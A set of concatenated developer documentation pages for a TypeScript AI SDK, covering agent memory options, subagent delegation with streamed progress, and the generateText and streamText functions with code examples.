title: Memory description: Add persistent memory to your agent using provider-defined tools, memory providers, or a custom tool.
Memory
Memory lets your agent save information and recall it later. Without memory, every conversation starts fresh. With memory, your agent builds context over time, recalls previous interactions, and adapts to the user.
Three Approaches
You can add memory to your agent with the AI SDK in three ways, each with different tradeoffs:
| Approach | Effort | Flexibility | Provider Lock-in |
|---|---|---|---|
| Provider-Defined Tools | Low | Medium | Yes |
| Memory Providers | Low | Low | Depends on memory provider |
| Custom Tool | High | High | No |
Provider-Defined Tools
Provider-defined tools are tools where the provider specifies the tool's inputSchema and description, but you provide the execute function. The model has been trained to use these tools, which can result in better performance compared to custom tools.
Anthropic Memory Tool
The Anthropic Memory Tool gives Claude a structured interface for managing a /memories directory. Claude reads its memory before starting tasks, creates and updates files as it works, and references them in future conversations.
import { anthropic } from '@ai-sdk/anthropic';
import { ToolLoopAgent } from 'ai';
const memory = anthropic.tools.memory_20250818({
execute: async action => {
// `action` contains `command`, `path`, and other fields
// depending on the command (view, create, str_replace,
// insert, delete, rename).
// Implement your storage backend here.
// Return the result as a string.
},
});
const agent = new ToolLoopAgent({
model: 'anthropic/claude-haiku-4.5',
tools: { memory },
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
The tool receives structured commands (view, create, str_replace, insert, delete, rename), each with a path scoped to /memories. Your execute function maps these to your storage backend (the filesystem, a database, or any other persistence layer).
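For illustration, a minimal in-memory backend might look like the following sketch. The action field names used here (command, path, file_text, old_str, new_str) are assumptions based on the command list above; consult the Anthropic tool documentation for the exact contract:
import { anthropic } from '@ai-sdk/anthropic';
// Hypothetical in-memory storage backend; swap in a real persistence layer.
const files = new Map<string, string>();
const memory = anthropic.tools.memory_20250818({
  execute: async action => {
    switch (action.command) {
      case 'view':
        return files.get(action.path) ?? 'File not found';
      case 'create':
        files.set(action.path, action.file_text ?? '');
        return `Created ${action.path}`;
      case 'str_replace': {
        const current = files.get(action.path) ?? '';
        files.set(action.path, current.replace(action.old_str, action.new_str));
        return `Updated ${action.path}`;
      }
      case 'delete':
        files.delete(action.path);
        return `Deleted ${action.path}`;
      default:
        return `Unsupported command: ${action.command}`;
    }
  },
});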
When to use this: you want memory with minimal implementation effort and are already using Anthropic models. The tradeoff is provider lock-in, since this tool only works with Claude.
Memory Providers
Another approach is to use a provider that has memory built in. These providers wrap an external memory service and expose it through the AI SDK's standard interface. Memory storage, retrieval, and injection happen transparently, and you do not define any tools yourself.
Letta
Letta provides agents with persistent long-term memory. You create an agent on Letta's platform (cloud or self-hosted), configure its memory there, and use the AI SDK provider to interact with it. Letta's agent runtime handles memory management (core memory, archival memory, recall).
pnpm add @letta-ai/vercel-ai-sdk-provider
import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';
const agent = new ToolLoopAgent({
model: lettaCloud(),
providerOptions: {
letta: {
agent: { id: 'your-agent-id' },
},
},
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
You can also use Letta's built-in memory tools alongside custom tools:
import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';
const agent = new ToolLoopAgent({
model: lettaCloud(),
tools: {
core_memory_append: lettaCloud.tool('core_memory_append'),
memory_insert: lettaCloud.tool('memory_insert'),
memory_replace: lettaCloud.tool('memory_replace'),
},
providerOptions: {
letta: {
agent: { id: 'your-agent-id' },
},
},
});
const stream = agent.stream({
prompt: 'What do you remember about me?',
});
See the Letta provider documentation for full setup and configuration.
Mem0
Mem0 adds a memory layer on top of any supported LLM provider. It automatically extracts memories from conversations, stores them, and retrieves relevant ones for future prompts.
pnpm add @mem0/vercel-ai-provider
import { createMem0 } from '@mem0/vercel-ai-provider';
import { ToolLoopAgent } from 'ai';
const mem0 = createMem0({
provider: 'openai',
mem0ApiKey: process.env.MEM0_API_KEY,
apiKey: process.env.OPENAI_API_KEY,
});
const agent = new ToolLoopAgent({
model: mem0('gpt-4.1', { user_id: 'user-123' }),
});
const { text } = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
Mem0 works across multiple LLM providers (OpenAI, Anthropic, Google, Groq, Cohere). You can also manage memories explicitly:
import { addMemories, retrieveMemories } from '@mem0/vercel-ai-provider';
await addMemories(messages, { user_id: 'user-123' });
const context = await retrieveMemories(prompt, { user_id: 'user-123' });
See the Mem0 provider documentation for full setup and configuration.
Supermemory
Supermemory is a long-term memory platform that adds persistent, self-growing memory to your AI applications. It provides tools that handle saving and retrieving memories automatically through semantic search.
pnpm add @supermemory/tools
__PROVIDER_IMPORT__;
import { supermemoryTools } from '@supermemory/tools/ai-sdk';
import { ToolLoopAgent } from 'ai';
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: supermemoryTools(process.env.SUPERMEMORY_API_KEY!),
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
Supermemory works with any AI SDK provider. The tools give the model addMemory and searchMemories operations that handle storage and retrieval.
See the Supermemory provider documentation for full setup and configuration.
Hindsight
Hindsight provides agents with persistent memory through five tools: retain, recall, reflect, getMentalModel, and getDocument. It can be self-hosted with Docker or used as a cloud service.
pnpm add @vectorize-io/hindsight-ai-sdk @vectorize-io/hindsight-client
__PROVIDER_IMPORT__;
import { HindsightClient } from '@vectorize-io/hindsight-client';
import { createHindsightTools } from '@vectorize-io/hindsight-ai-sdk';
import { ToolLoopAgent } from 'ai';
const client = new HindsightClient({ baseUrl: process.env.HINDSIGHT_API_URL });
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: createHindsightTools({ client, bankId: 'user-123' }),
instructions: 'You are a helpful assistant with long-term memory.',
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
The bankId identifies the memory store and is typically a user ID. In multi-user apps, call createHindsightTools inside your request handler so each request gets the right bank. Hindsight works with any AI SDK provider.
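For example, a multi-user route handler might construct the tools per request, as in this sketch (getUserId is a hypothetical session helper; the route shape is illustrative):
import { HindsightClient } from '@vectorize-io/hindsight-client';
import { createHindsightTools } from '@vectorize-io/hindsight-ai-sdk';
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const client = new HindsightClient({ baseUrl: process.env.HINDSIGHT_API_URL });
export async function POST(request: Request) {
  const { prompt } = await request.json();
  const userId = await getUserId(request); // hypothetical session helper
  // Scope the memory bank to the current user for this request.
  const agent = new ToolLoopAgent({
    model: __MODEL__,
    tools: createHindsightTools({ client, bankId: userId }),
  });
  const result = await agent.generate({ prompt });
  return Response.json({ text: result.text });
}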
See the Hindsight provider documentation for full setup and configuration.
When to use memory providers: these providers are a good fit when you want memory without building any storage infrastructure. The tradeoff is that the provider controls memory behavior, so you have less visibility into what gets stored and how it is retrieved. You also take on a dependency on an external service.
Custom Tool
Building your own memory tool from scratch is the most flexible approach. You control the storage format, the interface, and the retrieval logic. This requires the most upfront work but gives you full ownership of how memory works, with no provider lock-in and no external dependencies.
There are two common patterns:
- Structured actions: you define explicit operations (view, create, update, search) and handle structured input yourself. Safe by design since you control every operation.
- Bash-backed: you give the model a sandboxed bash environment to compose shell commands (cat, grep, sed, echo) for flexible memory access. More powerful but requires command validation for safety.
For a full walkthrough of implementing a custom memory tool with a bash-backed interface, AST-based command validation, and filesystem persistence, see the Build a Custom Memory Tool recipe.
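As a quick illustration of the structured-actions pattern, a custom memory tool might look like this sketch (an in-memory Map stands in for real persistence):
import { tool } from 'ai';
import { z } from 'zod';
// In-memory store; swap in a database or filesystem for real persistence.
const memories = new Map<string, string>();
const memoryTool = tool({
  description: 'Save, view, update, and search persistent memories.',
  inputSchema: z.object({
    action: z.enum(['view', 'create', 'update', 'search']),
    key: z.string(),
    value: z.string().optional(),
  }),
  execute: async ({ action, key, value }) => {
    switch (action) {
      case 'view':
        return memories.get(key) ?? 'No memory found';
      case 'create':
      case 'update':
        memories.set(key, value ?? '');
        return `Saved memory under "${key}"`;
      case 'search':
        return (
          [...memories.keys()].filter(k => k.includes(key)).join(', ') ||
          'No matches'
        );
    }
  },
});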
title: Subagents description: Delegate context-heavy tasks to specialized subagents while keeping the main agent focused.
Subagents
A subagent is an agent that a parent agent can invoke. The parent delegates work via a tool, and the subagent executes autonomously before returning a result.
How It Works
- Define a subagent with its own model, instructions, and tools
- Create a tool that calls it for the main agent to use
- Subagent runs independently with its own context window
- Return a result (optionally streaming progress to the UI)
- Control what the model sees using toModelOutput to summarize
When to Use Subagents
Subagents add latency and complexity. Use them when the benefits outweigh the costs:
| Use Subagents When | Avoid Subagents When |
|---|---|
| Tasks require exploring large amounts of information | Tasks are simple and focused |
| You need to parallelize independent research | Sequential processing suffices |
| Context would grow beyond model limits | Context stays manageable |
| You want to isolate tool access by capability | All tools can safely coexist |
Why Use Subagents?
Offloading Context-Heavy Tasks
Some tasks require exploring large amounts of information—reading files, searching codebases, or researching topics. Running these in the main agent consumes context quickly, making the agent less coherent over time.
With subagents, you can:
- Spin up a dedicated agent that uses hundreds of thousands of tokens
- Have it return only a focused summary (perhaps 1,000 tokens)
- Keep your main agent's context clean and coherent
The subagent does the heavy lifting while the main agent stays focused on orchestration.
Parallelizing Independent Work
For tasks like exploring a codebase, you can spawn multiple subagents to research different areas simultaneously. Each returns a summary, and the main agent synthesizes the findings—without paying the context cost of all that exploration.
Specialized Orchestration
A less common but valid pattern is using a main agent purely for orchestration, delegating to specialized subagents for different types of work. For example:
- An exploration subagent with read-only tools for researching codebases
- A coding subagent with file editing tools
- An integration subagent with tools for a specific platform or API
This creates a clear separation of concerns, though context offloading and parallelization are the more common motivations for subagents.
Basic Subagent Without Streaming
The simplest subagent pattern requires no special machinery. Your main agent has a tool that calls another agent in its execute function:
import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Define a subagent for research tasks
const researchSubagent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a research agent.
Summarize your findings in your final response.`,
tools: {
read: readFileTool, // defined elsewhere
search: searchTool, // defined elsewhere
},
});
// Create a tool that delegates to the subagent
const researchTool = tool({
description: 'Research a topic or question in depth.',
inputSchema: z.object({
task: z.string().describe('The research task to complete'),
}),
execute: async ({ task }, { abortSignal }) => {
const result = await researchSubagent.generate({
prompt: task,
abortSignal,
});
return result.text;
},
});
// Main agent uses the research tool
const mainAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant that can delegate research tasks.',
tools: {
research: researchTool,
},
});
This works well when you don't need to show the subagent's progress in the UI. The tool call blocks until the subagent completes, then returns the final text response.
Handling Cancellation
When the user cancels a request, the abortSignal propagates to the subagent. Always pass it through to ensure cleanup:
execute: async ({ task }, { abortSignal }) => {
const result = await researchSubagent.generate({
prompt: task,
abortSignal, // Cancels subagent if main request is aborted
});
return result.text;
},
If you abort the signal, the subagent stops executing and throws an AbortError. The main agent's tool execution fails, which stops the main loop.
To avoid errors about incomplete tool calls in subsequent messages, use convertToModelMessages with ignoreIncompleteToolCalls:
import { convertToModelMessages } from 'ai';
const modelMessages = await convertToModelMessages(messages, {
ignoreIncompleteToolCalls: true,
});
This filters out tool calls that don't have corresponding results. Learn more in the convertToModelMessages reference.
Streaming Subagent Progress
When you want to show incremental progress as the subagent works, use preliminary tool results. This pattern uses a generator function that yields partial updates to the UI.
How Preliminary Tool Results Work
Change your execute function from a regular function to an async generator (async function*). Each yield sends a preliminary result to the frontend:
execute: async function* ({ /* input */ }) {
// ... do work ...
yield partialResult;
// ... do more work ...
yield updatedResult;
}
Building the Complete Message
Each yield replaces the previous output entirely (it does not append). This means you need a way to accumulate the subagent's response into a complete message that grows over time.
The readUIMessageStream utility handles this. It reads each chunk from the stream and builds an ever-growing UIMessage containing all parts received so far:
import { readUIMessageStream, tool } from 'ai';
import { z } from 'zod';
const researchTool = tool({
description: 'Research a topic or question in depth.',
inputSchema: z.object({
task: z.string().describe('The research task to complete'),
}),
execute: async function* ({ task }, { abortSignal }) {
// Start the subagent with streaming
const result = await researchSubagent.stream({
prompt: task,
abortSignal,
});
// Each iteration yields a complete, accumulated UIMessage
for await (const message of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
yield message;
}
},
});
Each yielded message is a complete UIMessage containing all the subagent's parts up to that point (text, tool calls, and tool results). The frontend simply replaces its display with each new message.
Controlling What the Model Sees
Here's where subagents become powerful for context management. The full UIMessage with all the subagent's work is stored in the message history and displayed in the UI. But you can control what the main agent's model actually sees using toModelOutput.
How It Works
The toModelOutput function maps the tool's output to the tokens sent to the model:
const researchTool = tool({
description: 'Research a topic or question in depth.',
inputSchema: z.object({
task: z.string().describe('The research task to complete'),
}),
execute: async function* ({ task }, { abortSignal }) {
const result = await researchSubagent.stream({
prompt: task,
abortSignal,
});
for await (const message of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
yield message;
}
},
toModelOutput: ({ output: message }) => {
// Extract just the final text as a summary
const lastTextPart = message?.parts.findLast(p => p.type === 'text');
return {
type: 'text',
value: lastTextPart?.text ?? 'Task completed.',
};
},
});
With this setup:
- Users see: The full subagent execution—every tool call, every intermediate step
- The model sees: Just the final summary text
The subagent might use 100,000 tokens exploring and reasoning, but the main agent only consumes the summary. This keeps the main agent coherent and focused.
Write Subagent Instructions for Summarization
For toModelOutput to extract a useful summary, your subagent must produce one. Add explicit instructions like this:
const researchSubagent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a research agent. Complete the task autonomously.
IMPORTANT: When you have finished, write a clear summary of your findings as your final response.
This summary will be returned to the main agent, so include all relevant information.`,
tools: {
read: readFileTool,
search: searchTool,
},
});
Without this instruction, the subagent might not produce a comprehensive summary. It could simply say "Done", leaving toModelOutput with nothing useful to extract.
Rendering Subagents in the UI (with useChat)
To display streaming progress, check the tool part's state and preliminary flag.
Tool Part States
| State | Description |
|---|---|
| input-streaming | Tool input being generated |
| input-available | Tool ready to execute |
| output-available | Tool produced output (check preliminary) |
| output-error | Tool execution failed |
Detecting Streaming vs Complete
const hasOutput = part.state === 'output-available';
const isStreaming = hasOutput && part.preliminary === true;
const isComplete = hasOutput && !part.preliminary;
Type Safety for Subagent Output
Export types alongside your agents for use in UI components:
import { ToolLoopAgent, InferAgentUIMessage } from 'ai';
export const mainAgent = new ToolLoopAgent({
// ... configuration with researchTool
});
// Export the main agent message type for the chat UI
export type MainAgentMessage = InferAgentUIMessage<typeof mainAgent>;
Render Messages and Subagent Output
This example uses the types defined above to render both the main agent's messages and the subagent's streamed output:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MainAgentMessage } from '@/lib/agents';
export function Chat() {
const { messages } = useChat<MainAgentMessage>();
return (
<div>
{messages.map(message =>
message.parts.map((part, i) => {
switch (part.type) {
case 'text':
return <p key={i}>{part.text}</p>;
case 'tool-research':
return (
<div>
{part.state !== 'input-streaming' && (
<div>Research: {part.input.task}</div>
)}
{part.state === 'output-available' && (
<div>
{part.output.parts.map((nestedPart, i) => {
switch (nestedPart.type) {
case 'text':
return <p key={i}>{nestedPart.text}</p>;
default:
return null;
}
})}
</div>
)}
</div>
);
default:
return null;
}
}),
)}
</div>
);
}
Caveats
No Tool Approvals in Subagents
Subagent tools cannot use needsApproval. All tools must execute automatically without user confirmation.
Subagent Context is Isolated
Each subagent invocation starts with a fresh context window. This is one of the key benefits of subagents: they don't inherit the accumulated context from the main agent, which is exactly what allows them to do heavy exploration without bloating the main conversation.
If you need to give a subagent access to the conversation history, the messages are available in the tool's execute function alongside abortSignal:
execute: async ({ task }, { abortSignal, messages }) => {
const result = await researchSubagent.generate({
messages: [
...messages, // The main agent's conversation history
{ role: 'user', content: task }, // The specific task for this invocation
],
abortSignal,
});
return result.text;
},
Use this sparingly since passing full history defeats some of the context isolation benefits.
Streaming Adds Complexity
The basic pattern (no streaming) is simpler to implement and debug. Only add streaming when you need to show real-time progress in the UI.
title: Agents description: An overview of building agents with the AI SDK.
Agents
The following section shows you how to build agents with the AI SDK - systems where large language models (LLMs) use tools in a loop to accomplish tasks.
<IndexCards cards={[ { title: 'Overview', description: 'Learn what agents are and why to use the ToolLoopAgent.', href: '/docs/agents/overview', }, { title: 'Building Agents', description: 'Complete guide to creating agents with the ToolLoopAgent.', href: '/docs/agents/building-agents', }, { title: 'Workflow Patterns', description: 'Structured patterns using core functions for complex workflows.', href: '/docs/agents/workflows', }, { title: 'Loop Control', description: 'Advanced execution control with stopWhen and prepareStep.', href: '/docs/agents/loop-control', }, { title: 'Configuring Call Options', description: 'Pass type-safe runtime inputs to dynamically configure agent behavior.', href: '/docs/agents/configuring-call-options', }, { title: 'Subagents', description: 'Delegate context-heavy tasks to specialized subagents while keeping the main agent focused.', href: '/docs/agents/subagents', }, ]} />
title: Overview description: An overview of AI SDK Core.
AI SDK Core
Large Language Models (LLMs) are advanced programs that can understand, create, and engage with human language on a large scale. They are trained on vast amounts of written material to recognize patterns in language and predict what might come next in a given piece of text.
AI SDK Core simplifies working with LLMs by offering a standardized way of integrating them into your app - so you can focus on building great AI applications for your users, not waste time on technical details.
For example, here’s how you can generate text with various models using the AI SDK:
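A minimal sketch (the model string is illustrative and can be swapped for any supported provider/model):
import { generateText } from 'ai';
const { text } = await generateText({
  // Swap this string to use a different provider or model.
  model: 'openai/gpt-4o',
  prompt: 'What is love?',
});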
AI SDK Core Functions
AI SDK Core has various functions designed for text generation, structured data generation, and tool usage. These functions take a standardized approach to setting up prompts and settings, making it easier to work with different models.
- generateText: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
- streamText: Streams text and tool calls. You can use the streamText function for interactive use cases such as chat bots and content streaming.
Both generateText and streamText support structured output via the output property (e.g. Output.object(), Output.array()), allowing you to generate typed, schema-validated data for information extraction, synthetic data generation, classification tasks, and streaming generated UIs.
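For example, a minimal structured-output call might look like this (the schema and prompt are illustrative):
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { output } = await generateText({
  model: __MODEL__,
  output: Output.object({
    schema: z.object({
      name: z.string(),
      ingredients: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a simple pasta recipe.',
});
// output is typed: { name: string; ingredients: string[] }
console.log(output.name, output.ingredients);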
API Reference
Please check out the AI SDK Core API Reference for more details on each function.
title: Generating Text description: Learn how to generate text with the AI SDK.
Generating and Streaming Text
Large language models (LLMs) can generate text in response to a prompt, which can contain instructions and information to process. For example, you can ask a model to come up with a recipe, draft an email, or summarize a document.
The AI SDK Core provides two functions to generate text and stream it from LLMs:
- generateText: Generates text for a given prompt and model.
- streamText: Streams text from a given prompt and model.
Advanced LLM features such as tool calling and structured data generation are built on top of text generation.
generateText
You can generate text using the generateText function. This function is ideal for non-interactive use cases where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can use more advanced prompts to generate text with more complex instructions and content:
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
system:
'You are a professional writer. ' +
'You write simple, clear, and concise content.',
prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});
The result object of generateText contains several properties with the generated data, available once the call completes:
- result.content: The content that was generated in the last step.
- result.text: The generated text.
- result.reasoning: The full reasoning that the model has generated in the last step.
- result.reasoningText: The reasoning text of the model (only available for some models).
- result.files: The files that were generated in the last step.
- result.sources: Sources that have been used as references in the last step (only available for some models).
- result.toolCalls: The tool calls that were made in the last step.
- result.toolResults: The results of the tool calls from the last step.
- result.finishReason: The reason the model finished generating text.
- result.rawFinishReason: The raw reason why the generation finished (from the provider).
- result.usage: The usage of the model during the final step of text generation.
- result.totalUsage: The total usage across all steps (for multi-step generations).
- result.warnings: Warnings from the model provider (e.g. unsupported settings).
- result.request: Additional request information.
- result.response: Additional response information, including response messages and body.
- result.providerMetadata: Additional provider-specific metadata.
- result.steps: Details for all steps, useful for getting information about intermediate steps.
- result.output: The generated structured output using the output specification.
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateText } from 'ai';
const result = await generateText({
// ...
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
onFinish callback
When using generateText, you can provide an onFinish callback that is triggered after the last step is finished (API Reference).
It contains the text, usage information, finish reason, messages, steps, total usage, and more:
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
// your own logic, e.g. for saving the chat history or recording usage
const messages = response.messages; // messages that were generated
},
});
Lifecycle callbacks (experimental)
generateText provides several experimental lifecycle callbacks that let you hook into different phases of the generation process.
These are useful for logging, observability, debugging, and custom telemetry.
Errors thrown inside these callbacks are silently caught and do not break the generation flow.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
prompt: 'What is the weather in San Francisco?',
tools: {
// ... your tools
},
experimental_onStart({ model, settings, functionId }) {
console.log('Generation started', { model, functionId });
},
experimental_onStepStart({ stepNumber, model, promptMessages }) {
console.log(`Step ${stepNumber} starting`, { model: model.modelId });
},
experimental_onToolCallStart({ toolName, toolCallId, input }) {
console.log(`Tool call starting: ${toolName}`, { toolCallId });
},
experimental_onToolCallFinish({ toolName, durationMs, error }) {
console.log(`Tool call finished: ${toolName} (${durationMs}ms)`, {
success: !error,
});
},
onStepFinish({ stepNumber, finishReason, usage }) {
console.log(`Step ${stepNumber} finished`, { finishReason, usage });
},
});
The available lifecycle callbacks are:
- experimental_onStart: Called once when the generateText operation begins, before any LLM calls. Receives model info, prompt, settings, and telemetry metadata.
- experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, prompt messages being sent, tools, and prior steps.
- experimental_onToolCallStart: Called right before a tool's execute function runs. Receives the tool name, call ID, and input.
- experimental_onToolCallFinish: Called right after a tool's execute function completes or errors. Receives the tool name, call ID, input, output (or undefined on error), error (or undefined on success), and durationMs.
- onStepFinish: Called after each step finishes. Now also includes stepNumber (zero-based index of the completed step).
streamText
Depending on your model and prompt, it can take a large language model (LLM) up to a minute to finish generating its response. This delay can be unacceptable for interactive use cases such as chatbots or real-time applications, where users expect immediate responses.
AI SDK Core provides the streamText function which simplifies streaming text from LLMs:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
});
// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
console.log(textPart);
}
You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC.
The result object contains several helper functions to make the integration into AI SDK UI easier:
- result.toUIMessageStreamResponse(): Creates a UI Message stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
- result.pipeUIMessageStreamToResponse(): Writes UI Message stream delta output to a Node.js response-like object.
- result.toTextStreamResponse(): Creates a simple text stream HTTP response.
- result.pipeTextStreamToResponse(): Writes text delta output to a Node.js response-like object.
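For example, a minimal Next.js App Router route handler might look like this sketch (the request shape is illustrative):
import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();
  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });
  // Stream the response back to the AI SDK UI client.
  return result.toUIMessageStreamResponse();
}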
It also provides several promises that resolve when the stream is finished:
- result.content: The content that was generated in the last step.
- result.text: The generated text.
- result.reasoning: The full reasoning that the model has generated.
- result.reasoningText: The reasoning text of the model (only available for some models).
- result.files: Files that have been generated by the model in the last step.
- result.sources: Sources that have been used as references in the last step (only available for some models).
- result.toolCalls: The tool calls that have been executed in the last step.
- result.toolResults: The tool results that have been generated in the last step.
- result.finishReason: The reason the model finished generating text.
- result.rawFinishReason: The raw reason why the generation finished (from the provider).
- result.usage: The usage of the model during the final step of text generation.
- result.totalUsage: The total usage across all steps (for multi-step generations).
- result.warnings: Warnings from the model provider (e.g. unsupported settings).
- result.steps: Details for all steps, useful for getting information about intermediate steps.
- result.request: Additional request information from the last step.
- result.response: Additional response information from the last step.
- result.providerMetadata: Additional provider-specific metadata from the last step.
onError callback
streamText immediately starts streaming to enable sending data without waiting for the model.
Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.
To log errors, you can provide an onError callback that is triggered when an error occurs.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onError({ error }) {
console.error(error); // your error logging logic here
},
});
onChunk callback
When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.
It receives the following chunk types:
- text
- reasoning
- source
- tool-call
- tool-input-start
- tool-input-delta
- tool-result
- raw
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onChunk({ chunk }) {
// implement your own logic here, e.g.:
if (chunk.type === 'text') {
console.log(chunk.text);
}
},
});
onFinish callback
When using streamText, you can provide an onFinish callback that is triggered when the stream is finished (API Reference).
It contains the text, usage information, finish reason, messages, steps, total usage, and more:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
// your own logic, e.g. for saving the chat history or recording usage
const messages = response.messages; // messages that were generated
},
});
Lifecycle callbacks (experimental)
streamText provides several experimental lifecycle callbacks that let you hook into different phases of the streaming process.
These are useful for logging, observability, debugging, and custom telemetry.
Errors thrown inside these callbacks are silently caught and do not break the streaming flow.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'What is the weather in San Francisco?',
tools: {
// ... your tools
},
experimental_onStart({ model, system, prompt, messages }) {
console.log('Streaming started', { model, prompt });
},
experimental_onStepStart({ stepNumber, model, messages }) {
console.log(`Step ${stepNumber} starting`, { model: model.modelId });
},
experimental_onToolCallStart({ toolCall }) {
console.log(`Tool call starting: ${toolCall.toolName}`, {
toolCallId: toolCall.toolCallId,
});
},
experimental_onToolCallFinish({ toolCall, durationMs, success, error }) {
console.log(`Tool call finished: ${toolCall.toolName} (${durationMs}ms)`, {
success,
});
},
onStepFinish({ finishReason, usage }) {
console.log('Step finished', { finishReason, usage });
},
});
The available lifecycle callbacks are:
- experimental_onStart: Called once when the streamText operation begins, before any LLM calls. Receives model info, prompt, settings, and telemetry metadata.
- experimental_onStepStart: Called before each step (LLM call). Receives the step number, model, messages being sent, tools, and prior steps.
- experimental_onToolCallStart: Called right before a tool's execute function runs. Receives the tool call object, messages, and context.
- experimental_onToolCallFinish: Called right after a tool's execute function completes or errors. Receives the tool call object, durationMs, and a discriminated union with success/output or success/error.
- onStepFinish: Called after each step finishes. Receives the finish reason, usage, and other step details.
fullStream property
You can read a stream with all events using the fullStream property.
This can be useful if you want to implement your own UI or handle the stream in a different way.
Here is an example of how to use the fullStream property:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = streamText({
model: __MODEL__,
tools: {
cityAttractions: {
inputSchema: z.object({ city: z.string() }),
execute: async ({ city }) => ({
attractions: ['attraction1', 'attraction2', 'attraction3'],
}),
},
},
prompt: 'What are some San Francisco tourist attractions?',
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'start': {
// handle start of stream
break;
}
case 'start-step': {
// handle start of step
break;
}
case 'text-start': {
// handle text start
break;
}
case 'text-delta': {
// handle text delta here
break;
}
case 'text-end': {
// handle text end
break;
}
case 'reasoning-start': {
// handle reasoning start
break;
}
case 'reasoning-delta': {
// handle reasoning delta here
break;
}
case 'reasoning-end': {
// handle reasoning end
break;
}
case 'source': {
// handle source here
break;
}
case 'file': {
// handle file here
break;
}
case 'tool-call': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool call here
break;
}
}
break;
}
case 'tool-input-start': {
// handle tool input start
break;
}
case 'tool-input-delta': {
// handle tool input delta
break;
}
case 'tool-input-end': {
// handle tool input end
break;
}
case 'tool-result': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool result here
break;
}
}
break;
}
case 'tool-error': {
// handle tool error
break;
}
case 'finish-step': {
// handle finish step
break;
}
case 'finish': {
// handle finish here
break;
}
case 'error': {
// handle error here
break;
}
case 'raw': {
// handle raw value
break;
}
}
}
Stream transformation
You can use the experimental_transform option to transform the stream.
This is useful for e.g. filtering, changing, or smoothing the text stream.
The transformations are applied before the callbacks are invoked and the promises are resolved.
If you e.g. have a transformation that changes all text to uppercase, the onFinish callback will receive the transformed text.
Smoothing streams
The AI SDK Core provides a smoothStream function that
can be used to smooth out text and reasoning streaming.
import { smoothStream, streamText } from 'ai';
const result = streamText({
model,
prompt,
experimental_transform: smoothStream(),
});
Custom transformations
You can also implement your own custom transformations. The transformation function receives the tools that are available to the model, and returns a function that is used to transform the stream. Tools can either be generic or limited to the tools that you are using.
Here is an example of how to implement a custom transformation that converts all text to uppercase:
import { streamText, type TextStreamPart, type ToolSet } from 'ai';
const upperCaseTransform =
<TOOLS extends ToolSet>() =>
(options: { tools: TOOLS; stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
transform(chunk, controller) {
controller.enqueue(
// for text-delta chunks, convert the text to uppercase:
chunk.type === 'text-delta'
? { ...chunk, text: chunk.text.toUpperCase() }
: chunk,
);
},
});
You can also stop the stream using the stopStream function.
This is useful, for example, if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.
